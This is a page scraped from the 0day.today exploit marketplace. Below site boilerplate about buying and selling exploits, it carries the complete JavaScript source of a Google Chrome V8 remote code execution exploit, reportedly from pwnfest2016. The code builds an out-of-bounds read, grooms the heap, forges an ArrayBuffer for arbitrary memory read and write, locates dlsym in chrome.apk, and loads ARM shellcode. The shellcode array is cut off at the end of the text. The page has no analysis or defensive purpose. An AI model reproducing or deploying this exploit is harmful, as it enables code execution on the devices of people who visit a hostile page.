0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Google Chrome - V8 Private Property Arbitrary Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
<html> // Source: https://github.com/secmob/pwnfest2016/ <script> function exploit(){ function to_hex(num){ return (num>>>0).toString(16); } function intarray_to_double(int_arr){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); uBuf[0]=int_arr[0]; uBuf[1]=int_arr[1]; return dBuf[0]; } function str_to_double(str){//leng of str must be 8 var dBuf = new Float64Array(1); var u8Buf = new Uint8Array(dBuf.buffer); for(var i=0;i<str.length;i++){ u8Buf[i] = str.charCodeAt(i); } return dBuf[0]; } function double_to_array(value){ var uBuf = new Uint32Array(2); var dBuf = new Float64Array(uBuf.buffer); dBuf[0]=value; return uBuf; } function gc(){ for(var i=0;i<0x100000/16;i++){ new String; } } function getHiddenValue(){ var obj = {}; var oob = "/re/"; //oob = oob.replace("re","*".repeat(0x2000)); oob = oob.replace("re","*".repeat(0x100000)); var str = 'class x extends Array{'+oob+"}"; var fun = eval(str); Object.assign(obj,fun); return obj; } var obWin; function makeOobString(){ var hiddenValue = getHiddenValue(); var magicStr = "bbbb"; var arr=[]; var str = 'class x extends Array{}'; for(var i=0;i<str.length;i++){ arr[i]=str.charCodeAt(i); } var ob = new Array(0x200); ob.fill(0x31313131); gc(); gc(); str=String.fromCharCode.apply(null,arr); ob=ob.concat(0x32323232); var fun = eval(str); ob[2]=str; ob[3]=ob; Object.assign(fun,hiddenValue); var oobString = fun.toString(); gc(); gc(); print("begin search"); var subStr = oobString.substr(0,0x8000); var pos = subStr.indexOf(magicStr); print("end search"); if(pos==-1){ print("find magic failed"); postMessage(false); self.close(); print("unpossible"); throw "error"; }else{ print("find magic at "+pos); } oobString = oobString.substr(pos,ob.length*4); obWin=ob; return oobString; } var oobString = makeOobString(); print("get oob string successfully"); function print(){ console.log.apply(null,arguments); /*document.write('<p >'); document.write.apply(document,arguments); document.write("<p>");*/ } function str2arr(str,len){//len must be multile of 4 if(len===undefined) len = str.length; var u8a = new Uint8Array(len); for(var i=0;i<len;i++){ u8a[i] = str.charCodeAt(i); } return new Uint32Array(u8a.buffer); } function pArrayInHex(arr){ var result="<p style='font-size:8px'>"; for(var i=0;i<arr.length;i++){ result+=(arr[i]+0x100000000).toString(16).substr(-8); result+=" "; if(i%8==7) result+="<p style='font-size:8px'>"; } result+="<p>"; print(result); //alert(result); return result; } function pStrInHex(str){ //var result="<p style='font-size:8px'>"; var result="\n"; for(var i=0;i<str.length;i++){ var code = str.charCodeAt(i); result+=(code+0x100).toString(16).substr(-2); if(i%4==3) result+=" "; if(i%32==31) // result+="<p style='font-size:8px'>"; result+="\n"; } // result+="<p>"; result+="\n"; print(result); return result; } function getObjAddr(obj){ obWin[0]=obj; var value2= ((str2arr(oobString,4))[0]); return value2>>>0; } var getObj24BitsAddr = function(){ var smi=0; var code = 0; var i=0; //don't allocate heap object function getAddr(obj){ obWin[0]=obj; value=0; code = 0; i=0; for(i=2;i>=0;i--){ code = oobString.charCodeAt(i); value = code+value*256; } return value; } return getAddr; }(); var lengthInOldSpace = 0xfffffffc; var abarr=new Array(800); function sprayVM(){ var i=0; var j=0; try{ for(i=0;i<20;i++){ var u8 = new Uint8Array(0x10000000-0x500); abarr[i]=u8; } }catch(e){} try{ for(j=0;j<100;j++){ var u8 = new Uint8Array(0x8000000-0x500); abarr[i+j]=u8; } }catch(e){} print("allocate "+i+" 256M "+j+" 16M ") function getRandomInt(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } delete abarr[getRandomInt(0,i)]; } function getNewSpaceAddrs(){ /*var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%";*/ var objsInNewSpace = new Array(80); for(var i=0;i<objsInNewSpace.length;i++){ //var xx=escape(str); var xx = new Array(0x70000/4); objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0; //使newspace更离散 new Uint8Array(0x100000-0x500); new Uint8Array(0x100000-0x500); } function compareNumbers(a, b) { return a - b; } objsInNewSpace = Array.from(new Set(objsInNewSpace)); objsInNewSpace = objsInNewSpace.sort(compareNumbers); return objsInNewSpace; } print("begin get new space address"); var objsInNewSpace = getNewSpaceAddrs(); while(objsInNewSpace.length<16){ objsInNewSpace = getNewSpaceAddrs(); print("new space addresses"); pArrayInHex(objsInNewSpace); } try{ sprayVM(); }catch(e){} var selectedTrunk = 0; var selectedStr = ""; function bruteForceFengShui(){ var huge_str = "x".repeat(0x100000-0x9000);//-0x9000 huge_str +="%"; var hold = new Array(100); //var holdaddress = new Array(100); for(var i=0;;i++){ var large = escape(huge_str); var addr = getObjAddr(large); //console.log(addr.toString(16) + " "+i); if(i<hold.length){ hold[i]=large; //holdaddress[i]=addr; } addr=(addr&0xfff00000)>>>0; addr = addr-0x100000; if(objsInNewSpace.indexOf(addr)!=-1){ selectedTrunk = addr; selectedStr = large; abarr.fill(1); hold.fill(1); //holdaddress.fill(1); break; } if(i===150){ /*i=0; print("tried 200 times"); abarr.fill(1); try{ sprayVM(); }catch(e){};*/ postMessage(false); close(); throw "exceed limits"; } } } bruteForceFengShui(); //to avoid allocate memory latter, initilize here var nextTrunk = selectedTrunk + 0x100000; //生成一块足够大的可读写内存 var huge_str = "eval('');"; //8000不能太大,太大会使new_space增大 for(var i=0;i<8000;i++) huge_str += 'a.a;'; huge_str += "return 10;"; var huge_func = new Function('a',huge_str); huge_func({}); function fillNewSpace(origObj){ //first object in new space at 0x8100, new spaces layout //0x40000 //0x37f00 //..... //0x40000 var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25 var gap = gap+"%"; //flat gap gap.substr(0,100); var fillstr = "%20a".repeat((0x40000-12)/4); fillstr = escape(fillstr); var addr=0; for(var i=0;i<0x100;i++){ addr = getObj24BitsAddr(origObj); if((addr&0xfffff)===0x8101) origObj=escape(gap); else origObj=unescape(fillstr); } } function findNewSpace(){ var kMaxRegularHeapObjectSize =523776;// 507136; var str="1".repeat(kMaxRegularHeapObjectSize-0x2000); str+="%"; for(var i=0;;i++){ var xx=escape(str); var straddr = getObjAddr(xx); addr=(straddr&0xfff00000)>>>0; if(addr===selectedTrunk){ print("good state "+straddr.toString(16)); break; } } } function myencode(str){ var arr = []; for(var i=0;i<str.length;i++){ if(i%2==1) arr.push(str.charCodeAt(i)); else{ arr.push(37);//% var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2); arr.push(hexstr.charCodeAt(0)); arr.push(hexstr.charCodeAt(1)); } } return String.fromCharCode.apply(null,arr); } var dArray = []; var index = (0x8100-36)*2; for(var i=0;i<0x20000/8;i++){ dArray[i]=str_to_double("%03x%03x"); } var occulen = 0; var i = 0; var savedChunk = new Uint8Array(0x8100); var hiddenValue = getHiddenValue(); var arr=[]; fillNewSpace(new String); findNewSpace(); var classStr = 'class x extends Array{}'; for(var i=0;i<classStr.length;i++){ arr[i]=classStr.charCodeAt(i); } var magicStr = String.fromCharCode(0x86,0x24); classStr=String.fromCharCode.apply(null,arr); var ab = new ArrayBuffer(0x1243); var fun = eval(classStr); Object.assign(fun,hiddenValue); var oobStr = fun.toString(); /*(gdb) x/20xw 0x5600c45c array buffer layout * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 */ //overwrite huge string as array buffer var abLengthIndex = oobStr.indexOf(magicStr); var strArrayBuffer = oobStr.substr(abLengthIndex-12,32); //replace the byteLength var LengthAddr = getObjAddr(lengthInOldSpace); var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); var strBase = "\x00\x00\x00\x00"; strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); strArrayBuffer = myencode(strArrayBuffer); for(var i=0;i<strArrayBuffer.length/8;i++){ var d = strArrayBuffer.substr(i*8,8); dArray[index/8+i] = str_to_double(d); } var classStrAddr = getObjAddr(classStr)>>>0; //set read position var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head //length control the length of unscaped string, generated string has 12 bytes head //left 0x1000*2 bytes to avoid gc var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); //save the the chunk head to be corrupted var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); for(var i =0;i<savedThunkStr.length;i++){ savedChunk[i] = savedThunkStr.charCodeAt(i); } var pos1=new String; var pos1addr = getObj24BitsAddr(pos1)-1; //0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); //minus the length of double array if(occulen<0x40000+16+8) throw "no enough room"; occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray if(occulen%4!==0) throw "length don't align"; var arrocc=new Array((occulen/4)); //set unescape write position var occDoubleArray = dArray.concat(); var b=unescape(subOobStr); //restore the corrupted chunk head var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); for(var i=0;i<savedChunk.length;i++){ u8[i] = savedChunk[i]; } print("long string allocated at "+classStrAddr.toString(16)); if(typeof(selectedStr)==="string"){ print("overwrite failed"); postMessage(false); close(); return; //throw "overwrite failed"; } var fakeab = selectedStr; print("faked array buffer byte length is "+fakeab.byteLength.toString(16)); var globaldv = new Uint32Array(fakeab); function read_uint32(from_address){ var u32 = globaldv[(from_address/4)>>>0]; return u32>>>0; } function read_uint8(from_address){ from_address = from_address>>>0; var index = (from_address/4)>>>0; var mask = from_address%4; var u32 = globaldv[index]; u32 = u32<<8*(3-mask); return u32>>>24; } function read_uint32_unalign(from_address){ var u32 = 0; for(var i=3;i>=0;i--){ var u8 = read_uint8(from_address+i); u32 = u32*0x100+u8; } return u32>>>0; } //rw to execute //get function point of v8::internal::Accessors::ReconfigureToDataProperty function getFixedFunctionPoint(fakeab){ var FunctionAddress = getObjAddr(Function); var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); var map = u32[0]; u32 = new Uint32Array(fakeab,map-1,0x1000); //instance descriptors var descriptors = u32[7]; u32 = new Uint32Array(fakeab,descriptors-1,0x1000); var lengthAccessorInfo = u32[6]; u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); var setterForeign = u32[4]; u32 = new Uint32Array(fakeab,setterForeign-1,0x1000); var functionPoint = u32[1]; return functionPoint-1; } var funPoint = getFixedFunctionPoint(fakeab); print("ReconfigureToDataProperty at"+funPoint.toString(16)); var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 print("chrome.apk base at "+point.toString(16)); function find(startAddr,len,pattern){ for(var i=0; i<(len-pattern.length); i++ ) { for(var j=0;j<pattern.length;j++){ var temp = read_uint8(startAddr+i+j); //print(temp.toString(16)); if(temp!=pattern[j]) break; } if(j==pattern.length) return startAddr+i; } print("find failed"); } var pattern_position=find(point,0x10000000,pattern); print("find pattern at "+to_hex(pattern_position)); function get_dest_from_blx(addr) { var val = read_uint32_unalign(addr); var s = (val & 0x400) >> 10; var i1 = 1 - (((val & 0x20000000) >> 29) ^ s); var i2 = 1 - (((val & 0x8000000) >> 27) ^ s); var i10h = val & 0x3ff; var i10l = (val & 0x7fe0000) >> 17; var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); return ((addr + 4) & ~3) + off; } function backup_original_code(start_address){ var backup_arr = []; set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ backup_arr[i]=u8arr[i]; } return backup_arr; } function restore_original_code(start_address,backup_arr){ set_access_address(start_address); var u8arr=new Uint8Array(faked_ab); for(var i=0;i<shellcode.length+4096;i++){ u8arr[i]=backup_arr[i]; } } huge_func({}); print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4))); var dlsym_addr = get_dest_from_blx(pattern_position-4); print("dlsym address is "+to_hex(dlsym_addr)); var huge_func_address = getObjAddr(huge_func)-1; print("huge func address is "+to_hex(huge_func_address)); for(var i=0;i<20;i++){ print(to_hex(read_uint32(huge_func_address+i*4))); } var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 print("huge func code entry is "+to_hex(huge_func_code_entry)); print(to_hex(read_uint32(huge_func_code_entry))); //var so_str= ""; var shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0